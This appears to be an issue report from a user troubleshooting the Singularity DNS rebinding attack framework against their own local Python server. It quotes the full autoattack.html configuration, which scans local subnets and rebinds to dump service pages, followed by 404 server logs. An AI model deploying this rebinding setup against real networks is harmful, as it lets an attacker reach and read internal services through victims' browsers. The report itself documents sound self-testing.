autoattack.html trying to fetch soopayload.html on target #46
Description
Hi,
I tried to test my simple python app on port 8080 on localhost.
I own a domain and subdomain for this attack.
When I try to load the URL http://rebind.mydomain/autoattack.html, the rebind DNS is working but the simple payload try to fetch my simple python service with GET /soopayload.html which leads to 404...
I set up my config following this video :
https://www.youtube.com/watch?v=R5Y1luRhjbc
<!doctype html>
<html lang="en">
<head>
<title>Singularity of Origin DNS Rebinding Automatic Attack</title>
<script src="manager.js"></script>
<script src=scan-manager.js></script>
<meta charset="utf-8">
<meta http-equiv="x-dns-prefetch-control" content="off">
</head>
<body id="body" style="display: none">
The home page of vulnerable services will be dumped in the browser developer console.
<script>
const configuration = {
attackHostIPAddress: 'X.X.X.X', //my singularity web server
attackHostDomain: 'dynamic.mydomain', //which is NS entry
rebindingStrategy: 'ma',
attackPayload: 'Simple Fetch Get',
interval: "1",
flushDns: false,
indexToken: "<!--thisismytesttoken-->",
wsProxyPort: 3129,
hideActivity: false,
delayDOMLoad: false,
};
configuration.rebindingSuccessFn = (msg) => {
console.log(`Iframe reports attack successful for ${msg.origin}\n${msg.data.response}`);
}
app.getConfiguration().setManually(configuration);
let addrSpec = `0.0.0.0`; // this is a Linux Host
let searchForMoreAddresses = false;
const portSpec = '8080'; // python simple server port
function scanFoundNewTargetCb(result) {
console.log(result);
document.getElementById("activity").innerHTML += JSON.stringify(result, null, 4) + "<br/>";
app.attackTarget(result.target.address.replace("-", "--"), result.target.port, true);
}
function scanDoneCb(results) {
document.getElementById("activity").innerHTML += "Done.<br/>";
setTimeout(function () {
sm.shutDown();
}, 3000);
setTimeout(function () {
delaydomloadframe.src = "about:blank";
}, 90000);
}
async function getLocalIpAddressesThenScan() {
sm = ScanManager();
const externalAddress = await getMyExternalIpAddress();
addrSpec = `${addrSpec},${externalAddress}`;
getLocalIpAddress()
.then(address => {
const range = `${address.split('.', 3).join('.')}.1-254`;
sm.run(`${addrSpec},${range}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
},
e => {
console.log(e);
sm.run(`${addrSpec},192.168.1.1-254`, portSpec, scanFoundNewTargetCb, scanDoneCb);
})
}
if (searchForMoreAddresses === true) {
getLocalIpAddressesThenScan();
} else {
sm = ScanManager();
sm.run(`${addrSpec}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
}
</script>
<h3>Scanning Progress</h3>
<div id="activity"></div>
<h3>DNS Rebinding Progress</h3>
<div id=attackframes></div>
<iframe id=delaydomloadframe src="/delaydomload" style="display: none"></iframe>
</body>
</html>And this is the output of my python server :
127.0.0.1 - - [18/Feb/2022 19:37:59] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:37:59] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:00] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:00] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:01] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:01] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:02] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:02] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:04] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:04] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:05] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:05] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:06] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:06] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -